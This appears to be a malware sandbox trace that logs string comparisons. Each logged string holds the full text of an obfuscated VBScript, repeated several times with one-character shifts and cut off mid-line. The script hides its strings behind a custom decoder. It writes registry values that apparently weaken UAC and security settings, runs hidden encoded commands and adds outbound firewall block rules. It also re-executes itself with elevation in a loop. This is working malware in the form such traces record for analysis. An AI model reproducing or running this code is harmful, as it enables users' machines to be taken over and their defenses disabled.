bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.286] wcsncmp (_String1="\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 68 [0226.286] wcsncmp (_String1="\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0226.287] wcsncmp (_String1="key = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 94 [0226.287] wcsncmp (_String1="ey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite 